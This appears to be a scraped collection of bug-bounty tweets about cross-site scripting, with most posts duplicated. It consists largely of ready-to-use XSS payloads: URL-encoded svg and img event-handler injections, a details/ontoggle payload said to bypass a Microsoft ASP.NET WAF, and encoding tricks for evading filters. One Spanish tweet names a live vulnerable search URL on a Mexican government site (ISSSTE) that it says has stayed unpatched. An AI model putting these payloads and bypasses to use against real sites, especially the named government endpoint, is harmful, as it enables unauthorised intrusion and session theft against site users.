Ahmad Bin Ali 🎓2020🇸🇦(@MrHex88) 's Twitter Profile Photo

could be be triggers in itself, no need to parameter injection✌🏻

Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E

2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

tip tips

#XSS could be be triggers in #url itself, no need to parameter injection✌🏻

Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E

2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

#bugbounty #bugbountytip #bugbountytips
#MrHex88
account_circle
Lauritz(@_lauritz_) 's Twitter Profile Photo

TIL: HTML comments work as single-line-comments in JavaScript context 🤯

<script>
<!-- test --> alert(1);
alert(2);
</script>

Only alert(2) is executed.

TIL: HTML comments work as single-line-comments in JavaScript context 🤯

<script>
  <!-- test --> alert(1);
  alert(2); 
</script>

Only alert(2) is executed.

#HTML #LegacyStuff #XSS
account_circle
Call me matitanium(@MatinNouryan) 's Twitter Profile Photo

هر موقع یه self XSS پیدا کردید ازش رد نشین.
خیلی وقتا با کمی خلاقیت میتونه تبدیل بشه به یه آسیب پذیری حیاتی🙂🤨

هر موقع یه self XSS پیدا کردید ازش رد نشین.
خیلی وقتا با کمی خلاقیت  میتونه تبدیل بشه به یه آسیب پذیری حیاتی🙂🤨
account_circle
Sergio Medeiros(@grumpzsux) 's Twitter Profile Photo

XSS Bypass - working on ASPNET Generic Microsoft WAF (detected by AFW00F)

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//

Tag the original creator below so I can give them some hacker clout.

tip

XSS Bypass - working on ASPNET Generic Microsoft WAF (detected by AFW00F)

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041// 

Tag the original creator below so I can give them some hacker clout.

#bugbounty #bugbountytip
account_circle
Sergio Medeiros(@grumpzsux) 's Twitter Profile Photo

Basic XSS Encoding Tips ⏬

1) alert = window['al'+'ert']
2) bypass () with ``
3) replace space with /
4) encode symbols:

< = %3c
> = %3e
' = %22
[ = %5b
] = %5d
` = %60

Example Payload:
%3csvg/onload=window%5b'al'+'ert'%5d`1337`%3e

tips

account_circle
Ivan Castañeda(@ivancastl) 's Twitter Profile Photo

Este XSS fue reportado desde el 24 de junio de 2015 a las 07:07 horas y hasta la fecha no se ha hecho nada. ISSSTE

https[:]//oficinavirtual.issste.gob.mx/Resultados?Search='>XSS

Yo no lo hice, solo estoy avisando.

Este XSS fue reportado desde el 24 de junio de 2015 a las 07:07 horas y hasta la fecha no se ha hecho nada. @ISSSTE_mx

https[:]//oficinavirtual.issste.gob.mx/Resultados?Search='>XSS

Yo no lo hice, solo estoy avisando.
account_circle